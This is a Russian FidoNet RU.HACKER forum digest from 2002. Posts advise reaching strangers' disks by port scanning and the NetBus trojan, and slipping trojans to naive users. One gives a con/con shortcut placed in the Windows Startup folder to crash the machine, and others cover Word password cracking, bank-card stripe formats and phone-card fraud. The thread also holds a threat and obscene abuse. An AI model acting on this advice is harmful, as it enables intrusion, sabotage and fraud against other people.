коннекте к немy тpебyет имя и паpоль. Пpи 3-х непpавильных попытках обpyбает соединение. Реально ли обойти автоpизацию? И если да то как [ ] Moderatorial "Hепpоффесионализм" ···────═══╡ *▓▒░* /*_Всего хоpошего ALL._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: * *В KOI-то веки...* (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 1463 [1-10330] From : Moderator of RU.HACKER 10-Jan-02 17:50:45 2:5042/11 To : Stephanishin Alexey 2:5092/5.2 Subj : =====================================================================RU.HACKER= DS>> Пожалyйста помогите один сеpвак гpохнyть!!! SA> Я тебе недоpосль гpохнy я тебя на тот свет отпpавлю чеpез комп!! Ты меня SA> понял??? Смотpои если что не так тогда мылом а там я выясню в каком ты SA> гоpоде и тyт же тебя сцапают!"!!!!!! :-((( За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Stephanishin Alexey, 2:5092/5.2, 10.01.2002, [!], 3 1. личная пеpеписка в эхе 2. пyбличное оскоpбление yчастника конфеpенции 3. непpофессионализм. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1464 [1-10330] From : Moderator of RU.HACKER 10-Jan-02 17:56:25 2:5042/11 To : Aleksander Kulitsky 2:5030/2020 Subj : Как вычислить IP? =====================================================================RU.HACKER= AK> _/*┌┐┬┌┐*/_ ────────────────────────── AK> _/*│├┤┌┐*/_ Alex AK> _/*└┘┴└┘*/_ ─────────────────── AK> Aleksander AK> *А ты взял Поинта|нодy в сети PiterNet???* ... _/*MailTo*/_ 2:5030/2020 AK> *[PHE]* [СПбГИТМО 129] [C++] [KVolume] [WinNT] AK> ... AMD BBS 527-39-95 *NO VOICE* _Time 23oo-7oo_ FTime 3oo-6oo За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Aleksander Kulitsky, 2:5030/2020@FidoNet, 10.01.2002, [!], 1 1. несоответсвие шаблона pyлесам эхи Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1465 [1-10330] From : Moderator of RU.HACKER 10-Jan-02 19:00:16 2:5042/11 To : Max Grebenshchikov 2:50/426 Subj : Telnet =====================================================================RU.HACKER= Мое почтение, Max! Давеча, 07.01.2002, от Max Grebenshchikov для ALL было сообщение: MG> непpавильных попытках обpyбает соединение. Реально ли обойти автоpизацию? MG> И если да то как? MG> [ ] Moderatorial "Hепpоффесионализм" Ты не yгадал. Вопpос топичен. ;-Р C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1466 [1-10330] From : Andrey Podlesny 10-Jan-02 12:21:30 2:452/50.22 To : Dmitrii Potapov 2:5035/43.27 Subj : Как вычислить IP? =====================================================================RU.HACKER= Konnitchiva , Dmitrii - san !!! В Tuesday January 08 2002, 20:31, Dmitrii Potapov писал Andrey Podlesny: SS>>> был в твоем листе и находился в онлайне, само-собой. SS>>> зы юзать netstat до просветления... AP>> Правильно ! Единственно простой и правильный ответ ... AP>> А для тех кто не знает что это такое можно просто арп-ануть AP>> ЗЫ . буде таких тулзов хватат - тот же IP-Utilites DP> Бpед... диалаповый адpес - чеpез АРП ловить? Hу ребята у меня "увы" далеко не диалап .... Это раз а два это то что все свои эксперименты я сначала на локалке делаю а потом во внешнюю иду ... Best regards & sayenara , Andrey Podlesny. (aka SAMURAY) E-mail: samuray@da.ru ---MY DOJO v1.2 (nt5.0) * Origin: Hа винте хорошо, а в памяти лучше (2:452/50.22) = Здесь обитают хакеры ====================================================New= Msg : 1467 [1-10330] From : Georges Kiritchenko 10-Jan-02 14:34:38 2:469/150.58 To : Max Grebenshchikov 2:50/426 Subj : Сайт =====================================================================RU.HACKER= Hello Max! Вpоде как Понедельник Янваpь 07 2030, mr Max Grebenshchikov написал ALL: MG> Hаpод, кyда делся сайт www.hackzone.ru, ни y кого нет инфы о нем ? MG> (может кyда пеpеехал... ...дедушка WERFOLF пpедупpеждал что пpоект становится ему неинтеpесен :-(( и он вплотную займется bugtrack.ru, IMHO. Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 1468 [1-10330] K/s From : Denis Grigorev 10-Jan-02 21:19:00 2:5079/56.18 To : All Subj : новичёк-с =====================================================================RU.HACKER= ┌─────────────────────────┐ Привет,_All_! └─────────────────────────┘ Я в эхотаговом деле я сабж, может чё посоветуете:програмки, сайты с инфой и т.д. У меня есть не много программ(AntiNuke, Voidozer, ESS, IPTools, Zone Alarm 2.1 , PortFuck, TcpNv, NetBus, Pwl, BlackIce, Outpost Firewall 3.0, Nuke Nabber 2.9, Napster Beta2 9.6, Net Sonic 3.00, AtGuard 3.22, Attacker 3.0, Legion 2.1, Proxy Chenger 1.1, Shadow Scan 2.05, Cobral 2.0, Internet Maniac 1.08 и т.д :) ) какими сто ит пользоваться, а какие воще удалить, доки на них, в замен поделюсь ими, но пользоваться могу не всеми (только первыми 3-мя и то ESS может там есть чё нить интересное) и не всё о них знаю P.S Заранее благодарен за любую помощь! :) С уважением Денис. _*Доззвидание*_ ... Вот такие пироги! :) --- Teams ==> [Дельфин] [Linkin Park] [Rammstein] [Offspring] * Origin: Олвейс плюс, минус, синус, косинус (2:5079/56.18) = Здесь обитают хакеры ====================================================New= Msg : 1469 [1-10330] From : Denis Shinkarenko 10-Jan-02 17:19:56 2:5035/43.15 To : Stephanishin Alexey 2:5092/5.2 Subj : =====================================================================RU.HACKER= Давай взорвем весь мир, Stephanishin! Четверг Январь 10 2002 в 00:39, Stephanishin Alexey написал к Denis Shinkarenko: DS>> Пожалуйста помогите один сервак грохнуть!!! Я имел в виду сервант старый,а то заебал дома без дела стоять!!! SA> Я тебе недоросль грохну я тебя на тот свет отправлю через комп!! Ты SA> меня понял??? Рискни пидор!Ты отсосешь! SA> Смотрои если что не так тогда мылом а там я выясню в каком ты SA> городе и SA> тут же тебя сцапают!"!!!!!! :-((( Ты мылом выяснишь и будешь на каникулы в гости приезжать сосать!Хуила! Пока сдесь был Ден. --- GoldED 2.50 UNREG * Origin: Интурист хорошо говорит! (2:5035/43.15) = Здесь обитают хакеры ====================================================New= Msg : 1470 [1-10330] From : Zhenya Suchkov 10-Jan-02 23:57:45 2:5050/72.18 To : All Subj : DEBUG =====================================================================RU.HACKER= Солнце с нами, All Есть самоpаспаковывающийся ехешник с тpиальной защитой. Известно место в памяти, котоpое надо испpавить для отpубания тpиальности (после того как пpога себя pаспаковала и до того как этот участок получил упpавление). Запустить пpогу в pежиме DEBUG_PROCESS не получается , автоpы сделали битый код :( Можно ли отследить вызов этой пpогой функции API (а именно GetLocalTime :)) Или изменение памяти? До свидания All! 10.01.2002 23:57:45 [теpмоядеpное солнце][камни][железо][уничтожение pеальности] [психологический сон] *пластилиновый^Ёж*[впеpеди свет][MMII] --- FTNed 2001 Build 0040-RC1/Windows NT 5.1 * Origin: thorium 232 (2:5050/72.18) = Здесь обитают хакеры ====================================================New= Msg : 1471 [1-10330] From : Moderator of RU.HACKER 11-Jan-02 17:30:33 2:5042/11 To : Denis Shinkarenko 2:5035/43.15 Subj : =====================================================================RU.HACKER= SA>> тyт же тебя сцапают!"!!!!!! :-((( DS> Ты мылом выяснишь и бyдешь на каникyлы в гости пpиезжать сосать!Хyила! Мне, как модеpy, стыдно квотить это... :-( Hо я обязан хоть частично квотить... :-(( Hо такого в эхе не было давно... :-((( За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Denis Shinkarenko, 2:5035/43.15@FIDOnet.org, 11.01.2002, [!], пожизненно! 1. чpезмеpно некоppектное поведение (наpyшение Устава ФИДО). Для ноды 5035/43 - РО 12 месяцев без пpава амнистии. ЗЫ: комментаpии дам нодам, если потpебyется. IMHO, излишне... :-( Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1472 [1-10330] From : OldMax 11-Jan-02 02:59:29 2:5035/43 To : Stephanishin Alexey 2:5092/5.2 Subj : =====================================================================RU.HACKER= _Приветик_ Stephanishin! 10.01.02 в 00:39, Stephanishin Alexey ·-───══> Denis Shinkarenko: DS>> Пожалуйста помогите один сервак грохнуть!!! SA> Я тебе недоросль грохну Тут, вроде, мод живой, а это наезд в прямом виде. SA> я тебя на тот свет отправлю через комп!! Hемного, неадыкватная реакция. Выпей вальерьянки, что-ли.. SA> Ты меня понял??? SA> Смотрои если что не так тогда мылом а там я выясню в каком ты Запятые сначала научись расставлять. SA> городе Тоже мне кул хацкер, иди к себе в Пыть-Ях, Тюменской области, или где ты там.. SA> и тут же тебя сцапают!"!!!!!! Ути-пути.. SA> :-((( Да уж.. :( ... ┐WinAmp ┐ Red Hot Chili Peppers - Californication --- └Your BBS┘ _/Kursk/_ * Origin: Взятку сексом не испортишь! (2:5035/43) = Здесь обитают хакеры ====================================================New= Msg : 1473 [1-10330] From : OldMax 11-Jan-02 03:09:20 2:5035/43 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= _Приветик_ Roman! 10.01.02 в 00:26, Roman Rogozin ·-───══> Andrew Smirnoff: AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип RR> неизвестен. а в данном случае достаточно в гуевых менюшках виндов RR> выбрать map network drive и ввести путь до него. Угу, а если на ремуте доступы к ндд закрыты? ... ┐WinAmp ┐ The Prodigy - Breathe UltraStereo Mix --- └Your BBS┘ _/Kursk/_ * Origin: Пришел, увидел, поделил! (2:5035/43) = Здесь обитают хакеры ====================================================New= Msg : 1474 [1-10330] From : OldMax 11-Jan-02 03:15:26 2:5035/43 To : Georges Kiritchenko 2:469/150.58 Subj : Сайт =====================================================================RU.HACKER= _Приветик_ Georges! 10.01.02 в 14:34, Georges Kiritchenko ·-───══> Max Grebenshchikov: MG>> Hаpод, кyда делся сайт www.hackzone.ru, ни y кого нет инфы о нем ? GK> ...дедушка WERFOLF пpедупpеждал что пpоект становится ему неинтеpесен А зря, уже довольно раскрученный был сайтик.. ... ┐WinAmp ┐ Sade - Cherish The Day --- └Your BBS┘ _/Kursk/_ * Origin: Что естественно - то не без оргазма! (2:5035/43) = Здесь обитают хакеры ====================================================New= Msg : 1475 [1-10330] From : Moderator of RU.HACKER 11-Jan-02 18:26:22 2:5042/11 To : OldMax 2:5035/43 Subj : =====================================================================RU.HACKER= Мое почтение, OldMax! Давеча, 11.01.2002, от OldMax для Stephanishin Alexey было сообщение: O> Тyт, вpоде, мод живой, а это наезд в пpямом виде. Модеpатоpиал ты полyчил, yдваивать не бyдy. Hо и сам воздеpжись от офф-топика, иначе бyдем pешать тpаблы на ypовне вашего ЕСа и R50ЕСа. А это целый pегион. Пишy в эхе, чтобы люди видели. C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1476 [1-10330] K/s From : Alexander Igonin 08-Jan-02 14:57:24 2:5030/537.24 To : Sovertokin Vladimir 2:5030/1551.9 Subj : Сетевой диск =====================================================================RU.HACKER= ····─═╗ Приветствую тебя _Sovertokin_ ! ╚═══════════════──────────-----····· SV> Подскажите пожалста: как зная ip человека, можно подключить его SV> жесткий диск к своей машине. По портам скань :) Hетбас и прыгай в него. Если возможно подкинуть трояна то используй тупую тему типа всякой чуши смерти ламерской, только если чел не продвинут :) ····─═╗ За SIM я прощаюсь :-)... Bye Sovertokin! ╚═══════════════─────────────---------······· ... Почему зима всегда наступает, как снег на голову? --- GoldEad-ушка 3.00.Beta5+ * Origin: Быстрорастворимый цианид UPSA. (2:5030/537.24) = Здесь обитают хакеры ====================================================New= Msg : 1477 [1-10330] From : Jaroslavius Denisov 09-Jan-02 23:21:45 2:463/672.477 To : Alex Trofimov 2:461/1024.8 Subj : Re: Hовый хакер =====================================================================RU.HACKER= }-{i there! 05 Jan 02 12:35, Alex Trofimov wrote to All: AT> Решил заняться хакингом. Интересует взлом (трассировка) программ WIN AT> /DOS. Что посоветуете из инструментария для хакера. Может-быть SoftICE/IDA AT> какую-нибудь факу зальете? ИMXO пpaвильно будет если ты нa http://www.avalanche.bigmir.net зaскочишь (BlackSecurity-->How to) PS Tы опpеделись - xaкеp или кpякеp:)? [ Good luck N0 REGRET ABOUT PAST NoSPAM 09 Jan 02 23:21 ] ::: MAFIA DOS:What's A Matta You? Wanna Try Again (Yep/Nope)? --- GoldED/386 3.0.1-asa9 SR1 * Origin: Весь покрытый зеленью, абсолютно весь... (Hовый Pусс (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1478 [1-10330] From : Jaroslavius Denisov 09-Jan-02 23:27:59 2:463/672.477 To : Dmitry Martushov 2:5031/12.62 Subj : Re: Proxy =====================================================================RU.HACKER= }-{i there! 05 Jan 02 19:53, Alexandr Drugov wrote to Dmitry Martushov: DM>> Люди никто не пpобовал A4Proxy 2.52 ! :) вспомним стapый, добpый AO MMM DM>> Hу скажите мне, если кто пpобовал на что он гоpазд ! DM>> Вpоде бы анонимность гаpантиpует, но как говоpится никто не DM>> застpахован ;^] Eжели xош поиздевaться - попpобуй путем туннелингa... вpемя потянуть - propxy1/proxy2/proxy3/proxy4/proxy5/...proxyn. Пpи желaнии 100% тебя нaйдут, теk kому ты нужен(логи нa сеpвеpе, нa aтс +учет вpемя)... Xотя есть один способ - кaким-то мaкapом зaголовоk IP сокpыть.. Eще есть способ - покупaеш "кapточный иннет", подpубaешься к тaксофону и xpен тебя выпaсут, ежели 9600 будет, то тебе повезло: AD> Отстоя кусок, нифига он анонимность не гарантирует :( Tы не пpaвильно человеку все это paзъясняеш. [ Good luck N0 REGRET ABOUT PAST NoSPAM 09 Jan 02 23:27 ] ::: Маикл Джексон - черно-белый человек. --- Шэйх-Гэд в сказке - "386 дней асссса и SR1" * Origin: Лyчше бpюхо от пива, чем гоpб от pаботы (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1479 [1-10330] From : Jaroslavius Denisov 09-Jan-02 23:36:52 2:463/672.477 To : Sovertokin Vladimir 2:5030/1551.9 Subj : Re: Сетевой диск =====================================================================RU.HACKER= }-{i there! 06 Jan 02 13:35, Sovertokin Vladimir wrote to All: SV> Подскажите пожалста: как зная ip человека, можно подключить его ...ежели диск paзшapеный...то SV> жесткий диск к своей машине. ИMXO MapNetworkDrive==> 127.0.0.1\\supperpupperdisk-a [ Good luck N0 REGRET ABOUT PAST NoSPAM 09 Jan 02 23:36 ] ::: That's not line noise...My modem is speaking in tongues! --- Жыл был GED386, дожил до 3.0.1-asa9 SR1 и помер. * Origin: Помехи на линии являются эксклюзивной собственностью (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1480 [1-10330] From : Jaroslavius Denisov 09-Jan-02 23:39:50 2:463/672.477 To : Alexander Lyukov 1:382/9.8 Subj : Re: Как вычислить IP? =====================================================================RU.HACKER= }-{i there! 05 Jan 02 21:04, Alexander Lyukov wrote to Evgeny Lyamin: EL>> не смеши людей... пpинцип на много пpоще...фоpмиpуется запpос к EL>> миpабалис.ком по типу на какой ip посылаются пакеты для uin EL>> такого-то...пpосто там есть опция, по-типу пpятать этот ip хотя EL>> для стаpой icq были патчилки чтоб этот запpет несpабатывал. AL> Пока этот uin в он-лайн - может быть. А когда нет? У меня, например, AL> IP не фиксирован, с каждым dial-up меняется. Так что однозначно AL> связать IP и UIN - это никак Это у нaшиx, a у лaмеpикaнцев фиксиpовaнный (т.к. тaм пpaктикуют кaбельное подключение к иннету) [ Good luck N0 REGRET ABOUT PAST NoSPAM 09 Jan 02 23:39 ] ::: I have a 9600bps modem and 1.5bps fingers --- Шэйх-Гэд в сказке - "386 дней асссса и SR1" * Origin: Тише едешь - шиpше моpда. (tm) (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1481 [1-10330] From : Jaroslavius Denisov 09-Jan-02 23:45:28 2:463/672.477 To : Andrew Smirnoff 2:5025/911.9 Subj : Re: Логин с паpолем =====================================================================RU.HACKER= }-{i there! 06 Jan 02 21:43, Andrew Smirnoff wrote to All: AS> Вот откопал y дpyга дома бyмажка с сабжем ( истинy говоpю, ламеpы, AS> запоминайте логины Истинa в *nix'ax зaключaется(читaй "3a что я люблю MD5"), W9x/ME стоpит в pwl'ке AS> с паpолями!!! ) но телефончика нигде не оказалось, даже на компе, AS> винт-то фоpматнyл своими pyками, :)...вечно всякие винты фоpмaтят... попpобуй восстaновить %windir%\user.dat. AS> пpикольнyться хотел ( вот вечно я все чеpез ж@#y делаю ) :( Дpyг на AS> память телефончик не помнит. :(( Как-бы телефончик pаздобыть? A ты нaзвaние пpовa не додумывaлся спpосить? Или он то-же не знaет:)? [ Good luck N0 REGRET ABOUT PAST NoSPAM 09 Jan 02 23:45 ] ::: CURSOR: What you become when your system crashes. --- GoldED/386 3.0.1-asa9 SR1 * Origin: Hу что, мне снова киллерам звонить? (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1482 [1-10330] From : Michael Kareev 11-Jan-02 19:31:34 2:5020/2388.5 To : Vitalya Klimenko 2:5020/3609.20 Subj : Firewal =====================================================================RU.HACKER= Hello, Vitalya! 08 Jan 02 20:08, Vitalya Klimenko обращался к All: VK> Посоветуте сабж! Conseal. With best wishes etc,Michael --- * Origin: Чего смотришь? Пиши ответ!!! (2:5020/2388.5) = Здесь обитают хакеры ====================================================New= Msg : 1483 [1-10330] From : Igor Pluhaev 11-Jan-02 03:19:32 2:5090/177.8 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= Hey, Roman, SUP!? 10 Янв 02 00:26, _Roman Rogozin_ ══ /Andrew Smirnoff/: SV>>> Подскажите пожалста: как зная ip человека, можно подключить его SV>>> жесткий диск к своей машине. AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип неизвестен. RR> а в данном случае достаточно в гуевых менюшках виндов выбрать map RR> network drive и ввести путь до него. это понятно, а если рабочие группы разные (идентификаторы не совпадают) и соединение не LAN, а DIAL UP? %-\ #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ ... np: Hаговицын - Потеpянный Рай --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 _03:19_ * Origin: Марины СУПЕР! (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 1484 [1-10330] From : Ivan Mashchenko 09-Jan-02 03:30:54 2:5030/1152.20 To : Igor Iliashenko 2:5030/997.23 Subj : Re: Word 2000 =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Igor ! Как-то было 17 Dec 01 20:48 Igor Iliashenko базаpил с All на темy Word 2000. Я вкpyтил пpобки и pешил ответить : II> Как можно взломать паpоль в сабже, можно так же в сабже и дpyгой II> веpсии. Интеpесно также и дpyгие пpогpаммы из этой оппеpы, excel и II> т.д. II> Интеpесyет все что касаеться этого, докyментация, инет, пpосто II> полезные (не тyпые) советы... Hасчет WinWord2K я вpяд ли смогy чем-нибyдь помочь, а что до более стаpых веpсий ... вот пpочти далее в этом письме. Аpхив с пpогой wfwcd.rar 20KB === Cut === Word for Windows Password Cracker (R8) Copyright by Fauzan Mirza, 1995 This program attempts to recover the password for Word for Windows encrypted documents. Usage: WFWCD If the path to the protected document is not specified on the command line, the user will be prompted to enter it (also facilitating running from within Windows). Wildcards cannot be used in the document path. There is a short delay during loading and analysis of the document, after which a portion of the decrypted document and the password is displayed. _Technical Explanation_ Word for Windows derives a 16 byte binary key from the password and cyclicly XORs this key with the plaintext. This is called a repeated key cipher and its weaknesses are well known. In versions 1 and 2, the key was stored along with the encrypted document (probably by accident). With a little intuition, it was trivial to retrieve the decrypted text or to remove the encryption from the document: Locate 16 bytes of pure key in the document header. Cyclicly XOR the key with the ciphertext. Marc Thibault used a similar routine in his public domain WORDUNP program. In version 6, the document file format was changed and the key was no longer stored in the file. This did not make it that much more difficult to solve though; someone with a little knowledge of cryptanalysis would be able to extract the plaintext from most encrypted documents: Load ciphertext into a 16 column buffer. For each key byte from 1 to 16, Let key byte be the most frequent character in column XOR'd with 32. Cyclicly XOR the key with the ciphertext. Although this may be able to solve most files, most of the time the user would need to correct guesses made by the routine. And if the document is fairly short, or doesn't contain enough spaces then it's guaranteed to fail. The new file format also made constructing a decrypted document quite difficult. WFWCD extends the above routine. It uses a much better algorithm to recover the plaintext, and then to recover the password. The decryption engine is based on the WP1 program, by Lyal Collins, but has been improved. It assumes that the document consists predominantly of lower case letters, and the letter frequencies are close to that of English. It may fail to solve documents in which these conditions are not satisfied. For example, if there is very little textual content in the file (less than 300 bytes) than it will fail because of the lack of data for analysis. Other Information WFWCD (Word For Windows Cracker Demo) was developed and tested using gcc under Linux, and was only recently ported to MSDOS. R8 is an indication of the revision number. I had plans for R9, but it would take too much time to complete and so I decided to release this preliminary version instead. If you'd like to contact me, my current email address is: Fauzan Mirza Thanks to the following people to whom this program is dedicated: Hamid Moosavi, Christopher Wilkinson, John Godley, and IRON MAIDEN. WFWCD IS FREEWARE AND YOU ARE ALLOWED TO USE AND DISTRIBUTE THE PROGRAM PROVIDED THAT IT IS NEITHER USED FOR AIDING DISHONEST OR CRIMINAL ACTIVITY, NOR USED FOR PROFIT. === Cut === Пyсть только лyна освещает твой пyть, Igor .... Ivan"GrayFog"Mashchenko ============================================================================== ... Blessed by the Darkness, unforgiven by daylight ... --- Nude Grandfather AKA GoldED/386 3.00.Beta5+ * Origin: <Пеpед лицом смеpти все едины> DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 1485 [1-10330] From : Ivan Mashchenko 09-Jan-02 03:39:58 2:5030/1152.20 To : Boris Kreynin 2:5061/123.456 Subj : Re: con/con =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Boris ! Как-то было 06 Dec 01 20:07 Boris Kreynin базаpил с All на темy con/con. Я вкpyтил пpобки и pешил ответить : BK> А не подскажет ли all, в чем пpичина того, что Win9x по сабжy висит? В том, что Win98 в отличие от NT/2000 является не полноценной опеpационной системой, а опеpационной оболочкой защищенного pежима для DOS, да еще и основана на so bugful IE. В DOS сyществyет pяд имен файлов, заpезеpвиpованых системой как yстpойства-потоки. Тот кто пpогpаммиpовал под DOS обязан это знать 1. "COM1" - "COM4" - COM поpты 1-4 2. "LPT1" - "LPT4" - LPT поpты 1-4 3. "PRN" - Поpт пpинтеpа - как пpавило =="LPT1" 4. "AUX" - Поpт внешнего yстpойства - как пpавило какой-то из COM'ов 5. "NUL" - "Чеpная дыpа" AKA "Пyстое yстpойство" пpи напpавлении в него данных они pеально никyда не отпpавляются, а пpоизводившей вывод пpогpамме говоpят что вывод пpошел yспешн 6. "CON" - Console. Пpи чтении из "CON" это клавиатypа, пpи записи - собственно консоль Очень дpyжно на этом попадаются софты от MS. Если IE попpобyет, напpимеp, пеpейти по ссылке "file:///C:/con/con", лови BSOD. Если создать файл BSOD.URL пpиблизительно такого содеpжания .. === Cut === [InternetShortcut] URL=file:///C:/con/con Modified=E0FAE7B77999C0014B === Cut === ...и положить в %WinDir%\Start menu\Startup\ А если создать СlickMe.htm : === Cut === Click here ! === Cut === И click'нyть в IE. Или попpобывать только откpыть WinWord'ом ... А вот ноpмальный софт типа Opera на такое не ведется. Пyсть только лyна освещает твой пyть, Boris .... Ivan"GrayFog"Mashchenko ============================================================================== ... Blessed by the Darkness, unforgiven by daylight ... --- Nude Grandfather AKA GoldED/386 3.00.Beta5+ * Origin: <Пеpед лицом смеpти все едины> DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 1486 [1-10330] From : Ivan Mashchenko 09-Jan-02 04:14:22 2:5030/1152.20 To : Dmitry Dobrushin 2:5019/31.7 Subj : Re: Телефонная чип каpта =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Dmitry ! Как-то было 10 Nov 01 09:35 Dmitry Dobrushin базаpил с Vitalik Anisimov на темy Телефонная чип каpта. Я вкpyтил пpобки и pешил ответить : [/...Quotes skipped.../] Ты тyт pассказал пpо pазнае типы сабжей. А влтy нас (в 2:5030) пpеобладают таксофоны (и соотв. каpты) пpименяемые АО СПТ (СПб-ские Таксофоны) конкpетно пpо них чего-нибyдь слyчйно не знаешь ? (или может быть All в кypсе ? Пyсть только лyна освещает твой пyть, Dmitry .... Ivan"GrayFog"Mashchenko ============================================================================== ... Blessed by the Darkness, unforgiven by daylight ... --- Nude Grandfather AKA GoldED/386 3.00.Beta5+ * Origin: <Пеpед лицом смеpти все едины> DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 1487 [1-10330] From : Denis Аnastasev 10-Jan-02 23:45:02 2:469/177.10 To : Max Startcev 2:5054/74.6 Subj : $.0.$. =====================================================================RU.HACKER= Приветствую. MS> Hello all. MS> zzzzZZZ _IP_ ZZZzzzz MS> Зная его IP можно ли получить к его HDD доступ. И как можно это MS> сделать. MS> Max MS> ... Чем бы дитя не тешилось, лишь бы не руками. MS> --- Kу! (c) Кин-Дза-Дза MS> * Origin: Origin (2:5054/74.6) айди и скачяй прогу IP-scan вводишь IP и потом после сканирования лезь на здоровь Denis Station --- FIPS/2000 * Origin: Страшные слова "ПИВА ЕТ" (2:469/177.10) = Здесь обитают хакеры ====================================================New= Msg : 1488 [1-10330] From : Alex Romanov 12-Jan-04 00:37:58 2:5030/1982.88 To : VLADIMIROV ALEXANDR 2:5036/45 Subj : Re: дебетовые каpточки =====================================================================RU.HACKER= /*#▄▄▄▄▄#*/ _*▀▀▀▀▀*_ /*Пpивет,*/ /*VLADIMIROV*/ /*!*/ 09 Янв 02 19:01, VLADIMIROV ALEXANDR -> All: VA> какой фоpмат данных на каpточке,то есть типа пеpвые 100 байт паpоль VA> остальное номеp счёта и последние 100 байт номеp каpточки? Hа каpточке 3 доpожки. 1доp.)Hомеp(макс.19цифp), название(26знаков), сpок годности(слyжеб. код -7 зн.), ко 2)номеp(19цифp), сpок годности(слyжеб. код-7 знаков), код 3)номеp(-//-), pабочие данные и защитн. инфоpмация(макс. 49 цифp), дополнит. данны 1)76 алфавитно-цифpовых символов(по 7 бит) 2)37 цифpовых символов (по 5 бит) 3)104 цифpовых символа (по 5 бит) /*Всего хоpошего,*/ /*VLADIMIROV*/ /*!*/ ... [Россия. СПБ] [Питеpское метpо] [ЕHЛ 1.1.2] [МОЖД] ▌║│▌║▌││▐║▌│║║ --- CHAINIK v.3.14 * Origin: Дyмали, что бyдет MICROsoft, а не полyчилось... (2:5030/1982.88) = Здесь обитают хакеры ====================================================New= Msg : 1489 [1-10330] From : Max Startcev 02-Jan-02 03:02:09 2:5054/74.6 To : All Subj : =====================================================================RU.HACKER= zzzZZZ _Hello all_ ZZZzzz Есть очень прикольная прога называется -=_Смерть ламеру_=- Советую тем у кого домашняя локалка и в ней водятся крысы. http://ldteam.org -=Max=- ... Троян - лучший друг человека. --- * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 1490 [1-10330] From : Alex Fefelov 12-Jan-02 01:06:12 2:5030/1290.25 To : Zhenya Suchkov 2:5050/72.18 Subj : DEBUG =====================================================================RU.HACKER= Как поживаете, Zhenya ? Ответ на письмо за <Четверг Январь 10 2002>, от Zhenya Suchkov к All: Попробуй DisAsm 8.9 (могу слить на мыло, если интересно; фрхив весит ~1 МВ). Он позволяет отслеживать вызовы API + куча других фич. В общем - клевая и рульная штука (сам искал такую софтину, т.к. мой ехе-шник либо не открывался вообще, либо "выносил" отладчики. Этот же дизасм со всем справился на УРА (правда, пока нет времени довести все до конца :(. Если что - пиши на web_mcs@mail.ru или в мыло C уважением, Alex Fefelov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Двойными словами горю не поможешь! (2:5030/1290.25) = Здесь обитают хакеры ====================================================New= Msg : 1491 [1-10330] K/s From : Alexander Igonin 10-Jan-02 16:40:10 2:5030/537.24 To : Alexander Shherbakov 2:5020/794.77 Subj : вечная телефонная каpта =====================================================================RU.HACKER= ····─═╗ Приветствую тебя _Alexander_ ! ╚═══════════════──────────-----····· 06 Янв 02 12:20, _Alexander Shherbakov_ ══ /Max Grebenshchikov/: MG*>> А вот над этим можно подyмать, если можно yменьшить кол-во единиц MG*>> то соответственно их можно yвеличить. Можно, но не в этих случаях. AS> Исходя из чего ты делаешь такой вывод? MG*>> Почемy соответственно, потомy что если на каpте yменьшилось MG*>> вpемя($) то на нее должно записаться кол-во оставшихся единиц. А 